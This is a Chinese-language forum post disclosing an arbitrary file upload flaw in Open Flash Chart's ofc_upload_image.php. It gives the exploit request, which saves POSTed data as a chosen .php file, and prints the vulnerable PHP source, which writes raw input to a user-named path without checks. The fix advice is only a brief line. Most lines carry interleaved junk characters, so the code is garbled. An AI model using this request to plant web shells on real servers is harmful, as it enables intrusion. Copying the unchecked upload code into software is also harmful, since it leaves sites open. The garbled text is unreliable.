POST 数据漏洞文件执行任意后缀文件保存
/ H7 s' n3 U. S$ q 漏洞文件/chart/php-ofc-library/ofc_upload_image.php4 E( k2 M; y3 J; ]9 n
1 k- r! ?3 N7 g/ L1 [# g' |0 F
利用:
) K& N' K6 |, S, h, Y/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名' \3 n8 u; K7 R" C) Z
# m& y2 s3 D8 N& S2 Z! ?
Post任意数据
+ Z0 I% x9 [) j B保存位置http://localhost/chart/tmp-upload-images/hfy.php
2 o5 n/ `" ?3 p( D# I1 _. S8 b2 _# j* I! W7 I" s+ q) S( |% S/ \
5 M" h$ G2 S* u最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~
' w7 S$ d+ i$ C& u. K( U/ W7 [7 A: D" N- M( l3 W
<?php5 M# M0 I" C0 u, M( x N7 k
& A& _% T& ~0 }6 Q//4 F0 |* q9 Z1 m. B: A# C1 o" e
// In Open Flash Chart -> save_image debug mode, you3 E7 Z, \: G" R6 J5 Y
// will see the 'echo' text in a new window.4 s& C" p5 A6 i8 d: i. E
//
* F, q0 X' ^2 J' |
% W' K) {' j- ~3 f7 M/*( L! i5 p/ G* r3 ~1 Y8 q* x* O6 l
5 p' O8 k( o4 S6 H: y
print_r( $_GET );: u# G5 ]: C5 f9 i7 `2 [9 Y" q
print_r( $_POST );0 X% I8 Z& n3 T9 M! ?' n
print_r( $_FILES );
$ F; I1 K1 C# C# u0 v
1 T* \: h, ]* ~+ ~print_r( $GLOBALS );
6 }# G9 l. M& `+ s q v0 z% ?print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
0 Y$ h5 L$ C8 U# W- u! l. R) L, P6 T! f6 Q+ b1 K$ F& A
*/$ Z( @; n# ?- b) f! f+ T1 ~# ^. x; a
// default path for the image to be stored //
( h* F! }- O, b& s$default_path = '../tmp-upload-images/';
: {3 ~, U( K! d( [& B: y0 Y* A, L( |; V$ |
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
' F h; M* c& m& h+ l# u6 Q3 U9 z- b, M9 X6 q3 X
// full path to the saved image including filename //
- \0 Y1 W; O+ Z2 e$destination = $default_path . basename( $_GET[ 'name' ] ); / e7 u) ?' p1 g4 u" O6 W% h
5 u( L: t4 X' J( p1 N
echo 'Saving your image to: '. $destination;
1 D( \4 u' D% {/ [5 w" N- u// print_r( $_POST );
5 O9 |, U% E. S// print_r( $_SERVER );( Y" V% |) G: `, o
// echo $HTTP_RAW_POST_DATA;
3 c8 w& p1 z, K+ G3 i5 f/ ^1 r0 D7 ?9 f; l1 H
//; w" Q' v8 m0 Q# q
// POST data is usually string data, but we are passing a RAW .png
- g0 ~; S& k4 G// so PHP is a bit confused and $_POST is empty. But it has saved
3 M; Q4 k: i# T# V// the raw bits into $HTTP_RAW_POST_DATA4 W9 A% g9 \$ n" O% G
//
s* V" H- f$ L4 s( l! y, M8 b; ?- e z, [# m# A3 [; E2 |
$jfh = fopen($destination, 'w') or die("can't open file");
8 z: n1 U; i$ t% Q2 X$ n; \fwrite($jfh, $HTTP_RAW_POST_DATA);& q4 ]. N; u1 V8 m
fclose($jfh);% l2 f# o0 b2 A
" V) r6 ~6 i! E) @5 Y2 q" q# b
//
0 d& ~ r! j% r; }3 n: j// LOOK:
" a2 G' |1 J5 d//4 T2 w8 s6 K4 u+ i- d$ V
exit();# y0 ^/ D% l( L7 \( q
//
/ @' h$ [1 f- ?; k* i, G// PHP5:$ L) N8 C' ]. ]
//+ K2 c6 y- T, {0 e. z7 J8 |$ G+ ~
" G8 [. j" q" J" ?& E8 X& W) m4 K
// default path for the image to be stored //" j, C; `6 p2 L# u* N, ]1 U
$default_path = 'tmp-upload-images/';1 S* Z- h2 E6 u& F
( s# L7 [. Q% U# Dif (!file_exists($default_path)) mkdir($default_path, 0777, true);& U9 K' c: T3 [
. r& V" q) v5 m. ]
// full path to the saved image including filename //9 N$ U* Z: M# U: Z# B8 e
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] ); + R5 p& k# v2 L
1 X! \, y6 N" W. E+ T) @) z2 p
// move the image into the specified directory //
+ H5 b5 ?* E3 s$ e# B& {if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {% T- ^) Z( G3 }! ?
echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";, I7 Q: l6 v/ f
} else {
7 E5 H: f/ n. s1 H echo "FILE UPLOAD FAILED";
, ]1 {( H: G8 w}
5 n% ~. K+ P5 O0 r, ^6 Z: E' t1 L& f, o
* s4 D6 F: A( N' N2 E V& n
?>
! t! A% I2 m6 e. i; S4 ]5 X( @* d; d
/ |+ E5 N9 k- F. z
: n1 j! x: e: _4 A) G6 p: \/ q( Z
# U' B, }* ] H& L+ J4 a- \+ b8 C& T, E, M; ]; N H6 q. ~2 o' Y
+ a2 _3 k4 P- L5 m7 k2 [! F
修复方案:
* ^/ e/ |! i& c这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞 " L# G, \2 H% e9 E' y
# q5 l6 w. `- G. Y- l& C/ N7 r
& U! w+ _' X. b0 K; _$ } U# A/ z5 y# s1 {5 A+ ]
8 ]/ b% P/ o" e- H
|
发表于 2013-2-23 12:38:58
收藏
支持
反对